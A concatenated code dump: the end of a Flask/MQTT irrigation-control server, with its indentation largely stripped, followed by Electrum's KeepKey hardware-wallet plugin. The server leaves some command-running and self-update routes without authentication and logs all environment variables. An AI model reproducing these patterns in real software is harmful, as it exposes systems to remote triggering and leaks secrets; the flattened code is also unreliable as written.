logger.warning(
"[Invalid Credential] someone else trying to use free pass user"
)
error = "Invalid Credentials. Please try again."
else:
login_user(registered_user, remember=True)
browser = request.headers.get("User-Agent")
if "Lynx" in browser:
return redirect("/about")
return redirect("/")
return render_template("login.html", error=error)
# somewhere to logout
@app.route("/logout")
@login_required
def logout():
logout_user()
return redirect("/login")
# handle page not found
@app.errorhandler(404)
def page_not_found(e):
return render_template("misc/404.html"), 404
# handle login failed
@app.errorhandler(401)
def redirect_to_login_page(e):
return redirect("/login")
def update_quarantine_cache():
with app.app_context():
QUARANTINE_CACHE.clear()
heartbeats = DB.session.query(
OasisHeartbeat.NODE_ID, OasisHeartbeat.QUARANTINE
).all()
for hb in heartbeats:
QUARANTINE_CACHE[hb.NODE_ID] = hb.QUARANTINE
logger.debug("[update_quarantine_cache] %s is %i", hb.NODE_ID, hb.QUARANTINE)
def update_support_cache():
with app.app_context():
SUPPORT_CACHE.clear()
supports = DB.session.query(
SupportData.NODE_ID, SupportData.TYPE
).all()
for support in supports:
SUPPORT_CACHE[support.NODE_ID] = support.TYPE
logger.info("[update_support_cache] %s is %s", support.NODE_ID, support.TYPE)
def get_modules_data(id):
with app.app_context():
time_start = dt.datetime.now()
if id is None:
latest = (
DB.session.query(
OasisData.NODE_ID, func.max(OasisData.TIMESTAMP).label("TIMESTAMP")
)
.group_by(OasisData.NODE_ID)
.subquery("t2")
)
modules = DB.session.query(OasisData).join(
latest,
and_(
OasisData.NODE_ID == latest.c.NODE_ID,
OasisData.TIMESTAMP == latest.c.TIMESTAMP,
),
)
else:
modules = (
DB.session.query(OasisData)
.filter(OasisData.NODE_ID == id)
.order_by(OasisData.TIMESTAMP.desc())
.limit(1)
)
time_end = dt.datetime.now()
elapsed_time = time_end - time_start
logger.debug(
"[database] call database for module page took %s secs",
elapsed_time.total_seconds(),
)
return modules
@app.route("/")
# @cache.cached()
@login_required
def index():
update_quarantine_cache()
latest_beat = (
DB.session.query(OasisHeartbeat)
.with_entities(OasisHeartbeat.LAST_UPDATE.label("LATEST_BEAT"))
.all()
)
modules = get_modules_data(None).all()
weather = dashboard.weather_currently()
raspberrypi = dashboard.raspberrypi()
nodes = dashboard.nodes(latest_beat)
farm = dashboard.farm(modules)
if cfg["WATER_TANK"]["MODE"] == "support" :
water_tank = wtm.get_current_solenoid_status_from_support()
else:
water_tank = wtm.get_current_solenoid_status()
logger.debug("[weather] %s", weather)
logger.debug("[raspberrypi] %s", raspberrypi)
logger.debug("[nodes] %s", nodes)
logger.debug("[farm] %s", farm)
logger.debug("[water_tank] %s", water_tank)
resp = make_response(
render_template(
"index.html",
weather=weather,
water_tank=water_tank,
farm=farm,
raspberrypi=raspberrypi,
nodes=nodes,
)
)
for key, value in analytics.default_param().items():
resp.set_cookie(key, str(value))
return resp
@app.route("/module", methods=["GET"])
# @cache.cached(query_string=True)
@login_required
def module():
update_quarantine_cache()
id = None
if "id" in request.args:
# example: http://localhost:8181/module?id=oasis-39732c
id = request.args["id"]
resp = make_response(
render_template("module.html", modules=get_modules_data(id), single=id)
)
for key, value in analytics.default_param().items():
resp.set_cookie(key, str(value))
return resp
@app.route("/remove", methods=["POST"])
@login_required
def node_remove():
id = request.form["NODE_ID"]
logger.debug("[remove] %s", id)
with app.app_context():
DB.session.query(OasisData).filter(OasisData.NODE_ID == id).delete()
DB.session.query(OasisHeartbeat).filter(OasisHeartbeat.NODE_ID == id).delete()
DB.session.commit()
return json.dumps({"status": "Success"})
@app.route("/configuration", methods=["POST"])
@login_required
def node_config():
id = request.form["id"]
logger.debug("[configuration] getting config for %s", id)
config = None
with app.app_context():
latest_db_config = (
DB.session.query(OasisData)
.filter(OasisData.NODE_ID == id)
.order_by(OasisData.TIMESTAMP.desc())
.first()
)
config = latest_db_config.config()
oasis_heartbeat = (
DB.session.query(OasisHeartbeat)
.filter(OasisHeartbeat.NODE_ID == id)
.first()
)
config["QUARANTINE"] = oasis_heartbeat.quarantine()
if "LIGHT" in latest_db_config.data():
config["LIGHT"] = latest_db_config.data()["LIGHT"]
else:
config["LIGHT"] = -1
if config is None:
logger.info(
"[configuration] no configuration was found in database. Getting defaults"
)
DEFAULT_CONFIG_FILE = os.path.join(COMMON_DIR, "config/oasis.json")
with open(DEFAULT_CONFIG_FILE, "r") as default_config:
config = json.load(default_config)
return json.dumps(config)
@app.route("/training", methods=["POST"])
@login_required
def training():
message = request.get_json()
analytics.feedback_online_process(message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], analytics.generate_moisture_req_msg(message))
return json.dumps({"status": "Success"})
@app.route("/reset-training", methods=["POST"])
@login_required
def reset_training():
message = request.get_json()
analytics.reset_online_process(message)
return json.dumps({"status": "Success"})
@app.route("/updatecfg", methods=["POST"])
@login_required
def updatecfg():
message = json.dumps(request.get_json())
logger.debug("[updatecfg] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
@app.route("/reset", methods=["POST"])
@login_required
def reset():
message = json.dumps(request.get_json())
logger.debug("[reset] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
@app.route("/status", methods=["POST"])
@login_required
def refresh():
message = json.dumps(request.get_json())
logger.debug("[status] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
@app.route("/command", methods=["POST"])
# @login_required
def command():
message = json.dumps(request.get_json())
logger.debug("[command] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
# curl -i -H "Content-Type: application/json" -X POST -d '{"COMMAND":"ligar", "DEVICE": "computador"}' http://127.0.0.1:8181/command-alexa
@app.route("/command-alexa", methods=["POST"])
@check_if_gui_is_enable
def command_alexa():
message = request.json
logger.info("[command-alexa] %s", message)
if "NODE_ID" in message:
logger.info("[command-alexa] publishing in mqtt ...")
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
else:
if cfg["ALEXA"]["ENABLE"]:
logger.info("[command-alexa] customised job enable")
command = message["COMMAND"]
device = message["DEVICE"]
script = cfg["ALEXA"][command.upper()][device.upper()]
logger.info("[command-alexa] executing script %s", script)
subprocess.check_output(script)
else:
logger.info("[command-alexa] customised job disable")
return json.dumps({"status": "Success"})
@app.route("/firmware", methods=["POST"])
@login_required
def firmware_action():
message = request.get_json()
node_id = message["NODE_ID"]
action = message["ACTION"]
if action == "backup":
logger.info("[firmware-action] BACKUP %s", message)
message = {"NODE_ID": node_id, "MESSAGE_ID": "backup", "STATUS": ["NODE"]}
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], json.dumps(message))
return json.dumps(
{"status": "success", "message": "backup request for " + node_id}
)
elif action == "upgrade":
logger.info("[firmware-upgrade] message=%s", message)
ESP_ADDR = "ESP_ADDR=" + message["NODE_IP"]
ota_output = subprocess.Popen(
["make", "-f", ESPMAKE_PARAM, "ota", ESP_ADDR],
cwd=NODE_HOME,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
result = str(ota_output.communicate()[0])
if "failed" in result:
# /home/msaito/github/makeEspArduino/makeEspArduino.mk:306: recipe for target 'ota' failed
return json.dumps(
{"status": "error", "message": "upgrade firmware for " + node_id}
)
return json.dumps(
{"status": "success", "message": "upgrade firmware for " + node_id}
)
elif action == "restore":
config = (
OasisData.query.filter(
OasisData.NODE_ID == node_id, OasisData.DATA["MESSAGE_ID"] == "backup"
)
.order_by(OasisData.TIMESTAMP.desc())
.first()
)
message = {
"NODE_ID": node_id,
"MESSAGE_ID": "restore",
"CONFIG": config.DATA["DATA"]["NODE"],
}
logger.info(
"[firmware-restore] TIMESTAMP=%s, CONFIG=%s", config.TIMESTAMP, message
)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], json.dumps(message))
return json.dumps(
{"status": "success", "message": "restore request for " + node_id}
)
return json.dumps({"status": "error"}), 403
@app.route("/firmware", methods=["GET"])
@cache.cached()
@login_required
def firmware():
with app.app_context():
time_start = dt.datetime.now()
latest = (
DB.session.query(
OasisData.NODE_ID, func.max(OasisData.TIMESTAMP).label("TIMESTAMP")
)
.group_by(OasisData.NODE_ID)
.subquery("t2")
)
modules = DB.session.query(OasisData).join(
latest,
and_(
OasisData.NODE_ID == latest.c.NODE_ID,
OasisData.TIMESTAMP == latest.c.TIMESTAMP,
),
)
time_end = dt.datetime.now()
elapsed_time = time_end - time_start
logger.debug(
"[database] call database for firmware page took %s secs",
elapsed_time.total_seconds(),
)
return render_template("firmware/firmware.html", modules=modules)
@app.route("/progress")
@login_required
def progress():
logger.info("[firmware] env: %s", os.environ)
# clean
logger.info("[firmware] cleaning arduino firmware")
clean_output = subprocess.check_output(
["make", "-f", ESPMAKE_PARAM, "clean"], cwd=NODE_HOME
)
logger.info("[firmware] %s", clean_output)
# build
logger.info("[firmware] building new arduino firmware")
build_output = subprocess.Popen(
["make", "-f", ESPMAKE_PARAM], cwd=NODE_HOME, stdout=subprocess.PIPE
)
def generate():
x = 0
while x <= 100:
line = build_output.stdout.readline()
yield "data:" + str(x) + "\n\n"
logger.info("[firmware] progress %i: %s", x, line.rstrip())
x = x + 1
return Response(generate(), mimetype="text/event-stream")
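# Sketch (not part of this server): the /progress endpoint streams server-sent
# events ("data:<n>\n\n" frames), so a client with an authenticated session (the
# route is @login_required) can follow the build progress over a streaming HTTP
# request. The URL below is a hypothetical local address.
def _example_follow_progress():
    import requests  # also imported at module level; repeated to keep the sketch self-contained

    with requests.get("http://localhost:8181/progress", stream=True) as resp:
        for line in resp.iter_lines(decode_unicode=True):
            if line and line.startswith("data:"):
                print("progress:", line[len("data:"):])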
app.register_blueprint(about_system)
app.register_blueprint(management)
app.register_blueprint(monitor)
@app.route("/webhook", methods=["POST"])
def webhook():
message = request.get_json()
if message is not None:
logger.info("[webhook] message:%s", message)
committer = message["pusher"]["name"]
commit_message = message["head_commit"]["message"]
logger.info("[webhook] commit:%s author:%s", commit_message, committer)
if (
cfg["MODE"]["AUTO_UPDATE_SERVER"] == True
and message["ref"] == cfg["GIT_BRANCH"]
):
logger.info("[webhook] applying update")
update_server_software()
else:
logger.warn("[webhook] auto updates not applied")
return json.dumps({"status": "request!"})
return json.dumps({"status": "request was ignored!"})
# curl -i -H "Content-Type: application/json" -X POST -d '{"DIRECTION":"IN", "ACTION":false}' http://localhost:8181/water-tank
@app.route("/water-tank", methods=["POST"])
def water_tank():
message = request.get_json()
direction = message["DIRECTION"] # IN or OUT
action = message["ACTION"] # true or false
if cfg["WATER_TANK"]["MODE"] == "support" :
support_data = DB.session.query(SupportData).filter(SupportData.TYPE == "WATER_TANK").one()
#message = json.dumps(request.get_json())
switch = "SWITCH_A" if direction == "IN" else "SWITCH_B"
message = json.dumps({
"NODE_ID": support_data.node_id(),
"MESSAGE_ID": message["MESSAGE_ID"],
"COMMAND": {switch : action}
})
logger.debug("[water-tank command] for %s", message)
mqtt.publish(cfg["MQTT"]["SUPPORT_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
else:
if cfg["WATER_TANK"]["MASTER"]:
logger.info("[water-tank] %s will be %s", direction, action)
if direction == "OUT":
wtm.changeStateWaterTankOut(action)
else:
wtm.changeStateWaterTankIn(action)
return json.dumps({"status": "Success"})
else:
url = "http://%s/water-tank" % (cfg["WATER_TANK"]["SERVER"])
logger.info("[water-tank] remote request. data=%s", message)
response = requests.post(url, json=message)
return response.json()
# curl -X GET http://localhost:8181/water-tank
@app.route("/water-tank", methods=["GET"])
def water_tank_status():
return wtm.get_current_solenoid_status()
@app.route("/irrigation")
@login_required
def standard_irrigation():
irrigation = Irrigation(logger, cfg, mqtt, socketio, oasis_properties)
thread = Thread(target=irrigation.run_standard)
thread.daemon = True
thread.start()
message = {}
message["SOURCE"] = "NABUCODONOSOR"
message["MESSAGE"] = (
"Irrigação foi iniciada manualmente em <b>" + os.uname()[1] + "</b>"
)
TelegramAssistantServer.send_monitor_message(message)
return json.dumps({"irrigation": "Started"})
@app.route("/quarantine", methods=["POST"])
@login_required
def quarantine():
data = request.get_json()
id = data["NODE_ID"]
change = data["QUARANTINE"]
logger.info("[quarantine] changing %s to %i", id, change)
with app.app_context():
DB.session.query(OasisHeartbeat).filter(OasisHeartbeat.NODE_ID == id).update(
{"QUARANTINE": change}
)
DB.session.commit()
message = {}
message["SOURCE"] = "NABUCODONOSOR"
if change:
message["MESSAGE"] = (
"Oasis <b>" + oasis_properties[id]["name"] + "</b> entrou em quarentena"
)
else:
message["MESSAGE"] = (
"Oasis <b>" + oasis_properties[id]["name"] + "</b> saiu de quarentena"
)
TelegramAssistantServer.send_monitor_message(message)
return json.dumps({"status": "Success"})
startup_time = int(time.time())
@app.before_first_request
def notify_telegram_users():
message = {}
message["SOURCE"] = "NABUCODONOSOR"
startup_time_formatted = dt.datetime.fromtimestamp(startup_time).strftime(
"%Y-%m-%d %H:%M:%S"
)
message["MESSAGE"] = (
"Sistema foi reiniciado no servidor <b>"
+ os.uname()[1]
+ "</b> às "
+ startup_time_formatted
)
logger.info("[notify_telegram_users] %s", message["MESSAGE"])
TelegramAssistantServer.send_monitor_message(message)
###############################################################################
################################# PROCESSORS ##################################
###############################################################################
@app.context_processor
def utility_processor():
def format_last_update(value):
return time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(int(value)))
def status_btn_css(argument):
switcher = {0: "btn-primary", 1: "btn-danger"}
return switcher.get(argument, "btn-primary disabled")
def status_btn(argument):
result = ""
if argument == "DISABLED":
result = "disabled"
return result
def status_node(node_id, last_update, sensor_collect_data_period, water):
last_update = int(last_update)
sensor_collect_data_period = 3 * int(sensor_collect_data_period) / 1000
now = int(time.time())
next_data_is_expected = last_update + sensor_collect_data_period
if next_data_is_expected >= now: # NEXT is future
if water:
return "good irrigation"
else:
return "good"
elif QUARANTINE_CACHE[node_id]:
return "quarantine"
else:
return "danger"
def status_moisture(node_id, port, level):
return analytics.status(node_id, port, level)
def value_moisture_mask(node_id, port, level):
return analytics.mask(node_id, port, level)
def weather_icon(argument):
switcher = {
"none": "wi wi-na",
"clear-day": "wi wi-day-sunny",
"clear-night": "wi wi-night-clear",
"rain": "wi wi-rain",
"snow": "wi wi-snow",
"sleet": "wi wi-sleet",
"wind": "wi wi-wind",
"fog": "wi wi-fog",
"cloudy": "wi wi-cloudy",
"partly-cloudy-day": "wi wi-forecast-io-partly-cloudy-day",
"partly-cloudy-night": "wi wi-forecast-io-partly-cloudy-day",
}
return switcher.get(argument, "wi wi-day-sunny")
def translate_name(node_id):
if node_id in oasis_properties:
return oasis_properties[node_id]["name"]
else:
return oasis_properties["oasis-undefined"]["name"]
def description(node_id):
if node_id in oasis_properties:
return oasis_properties[node_id]["desc"]
else:
return oasis_properties["oasis-undefined"]["desc"]
def mux_code(node_id, mux):
if node_id in oasis_properties:
return oasis_properties[node_id][mux]["cod"]
else:
return oasis_properties["oasis-undefined"][mux]["cod"]
def quarantine_icon(argument):
return QUARANTINE_CACHE.get(argument, "")
return {
"status_node": status_node,
"status_moisture": status_moisture,
"value_moisture_mask": value_moisture_mask,
"weather_icon": weather_icon,
"format_last_update": format_last_update,
"status_btn_css": status_btn_css,
"status_btn": status_btn,
"translate_name": translate_name,
"description": description,
"mux_code": mux_code,
"quarantine_icon": quarantine_icon,
}
###############################################################################
############################## HANDLE MQTT ####################################
###############################################################################
# The callback for when the client receives a CONNACK response from the server.
@mqtt.on_connect()
def handle_mqtt_connect(client, userdata, flags, rc):
logger.info("[MQTT] Connected with result code %s", str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
mqtt.subscribe(cfg["MQTT"]["OASIS_TOPIC_HEARTBEAT"])
mqtt.subscribe(cfg["MQTT"]["OASIS_TOPIC_OUTBOUND"])
mqtt.subscribe(cfg["MQTT"]["SUPPORT_TOPIC_OUTBOUND"])
@mqtt.on_unsubscribe()
def handle_unsubscribe(client, userdata, mid):
logger.info("[MQTT] Unsubscribed from topic %s !!!", str(mid))
@mqtt.on_disconnect()
def handle_disconnect():
logger.info("[MQTT] Disconnected!!!")
# The callback for when a PUBLISH message is received from the server.
@mqtt.on_message()
def handle_mqtt_message(client, userdata, msg):
timestamp = int(time.time())
try:
jmsg = json.loads(msg.payload)
    except Exception:
logger.info("[MQTT] Invalid message format %s", msg.payload)
return
node_id = jmsg["NODE_ID"]
topic = msg.topic
if not node_id.startswith("oasis-"):
logger.info("[MQTT] Invalid node_id %s in the topic %s. Message: %s", node_id, topic, jmsg)
return
if topic == cfg["MQTT"]["OASIS_TOPIC_HEARTBEAT"]:
heartbeat = OasisHeartbeat(NODE_ID=node_id, LAST_UPDATE=timestamp)
logger.debug("[heartbeat] %s", heartbeat.toJson())
socketio.emit("ws-oasis-heartbeat", data=heartbeat.toJson())
if isMqttEnabled:
with app.app_context():
merged = DB.session.merge(heartbeat)
QUARANTINE_CACHE[merged.NODE_ID] = merged.QUARANTINE
if topic == cfg["MQTT"]["OASIS_TOPIC_OUTBOUND"]:
data = OasisData(TIMESTAMP=timestamp, NODE_ID=node_id, DATA=jmsg)
if "DATA" in jmsg:
if isMqttEnabled and not QUARANTINE_CACHE[node_id]:
with app.app_context():
                    # TODO/FIXME: somehow this line of code makes saving training data more stable
dbdata = OasisData(TIMESTAMP=timestamp, NODE_ID=node_id, DATA=jmsg)
DB.session.merge(
dbdata
                    )  # avoid data collision due to manual status requests
json_data = jmsg["DATA"]
if "CAPACITIVEMOISTURE" in json_data:
moisture = json_data["CAPACITIVEMOISTURE"]
filtered = analytics.gui_noise_filter(node_id, timestamp, moisture)
data.capacitive_moisture(filtered)
logger.debug("[data-filtered] %s", filtered)
json_data = data.toJson()
socketio.emit("ws-oasis-data", data=json_data)
logger.debug("[data] %s", json_data)
if topic == cfg["MQTT"]["SUPPORT_TOPIC_OUTBOUND"]:
if "DATA" in jmsg:
data = SupportData(TIMESTAMP=timestamp, NODE_ID=node_id, DATA=jmsg["DATA"])
if isMqttEnabled:
with app.app_context():
merged = DB.session.merge(data)
SUPPORT_CACHE[merged.NODE_ID] = merged.TYPE
data.TYPE = SUPPORT_CACHE[data.NODE_ID]
logger.debug("[support-data] %s", data.toJson())
socketio.emit("ws-support-data", data=data.toJson())
@mqtt.on_log()
def handle_logging(client, userdata, level, buf):
logger.debug("[MQTT] %i, %s", level, buf)
if level == Mqtt.MQTT_LOG_ERR:
logger.error('[MQTT] Error: client:{} userdata:{} buf:{}'.format(client,userdata, buf))
###############################################################################
############################### SCHEDULE #####################################
###############################################################################
# https://medium.com/better-programming/introduction-to-apscheduler-86337f3bb4a6
sched = BackgroundScheduler(daemon=True)
if cfg["SCHEDULE"]["MOISTURE_MONITOR"] != "never":
def moisture_monitor():
global mqtt
global analytics
global socketio
# sched.print_jobs()
advice = analytics.irrigation_advice()
socketio.emit("ws-server-monitor", data=advice)
logger.info("[moisture_monitor] %s", advice)
# mqtt.publish("/schedule-test", "hellllooo")
moisture_monitor_trigger = CronTrigger.from_crontab(
cfg["SCHEDULE"]["MOISTURE_MONITOR"]
)
sched.add_job(moisture_monitor, moisture_monitor_trigger)
if cfg["SCHEDULE"]["IRRIGATION_BOT"] != "never":
irrigation = Irrigation(logger, cfg, mqtt, socketio, oasis_properties)
irrigation_trigger = CronTrigger.from_crontab(cfg["SCHEDULE"]["IRRIGATION_BOT"])
logger.info("[irrigation] type: %s", cfg["IRRIGATION"]["TYPE"])
if cfg["IRRIGATION"]["TYPE"] == "smart":
sched.add_job(irrigation.run_smart, irrigation_trigger)
elif cfg["IRRIGATION"]["TYPE"] == "dummy":
sched.add_job(irrigation.run_dummy, irrigation_trigger)
else:
sched.add_job(irrigation.run_standard, irrigation_trigger)
if cfg["SCHEDULE"]["IRRIGATION_INSPECTOR"] != "never":
logger.info("[IRRIGATION_INSPECTOR] enabled")
irrigation_inspector_trigger = CronTrigger.from_crontab(cfg["SCHEDULE"]["IRRIGATION_INSPECTOR"])
sched.add_job(irrigation.run_inspector, irrigation_inspector_trigger)
if cfg["SCHEDULE"]["WATCHDOG"] != "never":
logger.info("[watchdog] enabled")
watchdog_trigger = CronTrigger.from_crontab(cfg["SCHEDULE"]["WATCHDOG"])
watchdog = Watchdog(logger, cfg, oasis_properties)
sched.add_job(watchdog.run, watchdog_trigger)
sched.start()
###############################################################################
################################## START #####################################
###############################################################################
update_quarantine_cache()
update_support_cache()
if __name__ == "__main__":
print("")
print(" __ __ _ __ _ ")
print(" / /_ ____ _ / /_ (_)/ /____ ____ (_)____ _")
print(" / __ \ / __ `// __ \ / // // __ \ / __ \ / // __ `/")
print(" / /_/ // /_/ // /_/ // // // /_/ // / / // // /_/ / ")
print("/_.___/ \__,_//_.___//_//_/ \____//_/ /_//_/ \__,_/ ")
print("")
logger.info("*** STARTING NABUCODONOSOR SYSTEM ***")
logger.info("version: %s", VERSION)
# from werkzeug.middleware.profiler import ProfilerMiddleware
# app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[5], profile_dir='./profile')
    user_reload = False  # avoid a bug where two MQTT client instances are created when the reloader is on
socketio.run(
app,
host="0.0.0.0",
port=8181,
debug=cfg["MODE"]["DEBUG"],
use_reloader=user_reload,
)
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
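    # Build the protobuf HDNodePathType (parent node plus derivation suffix) that the device expects.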
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
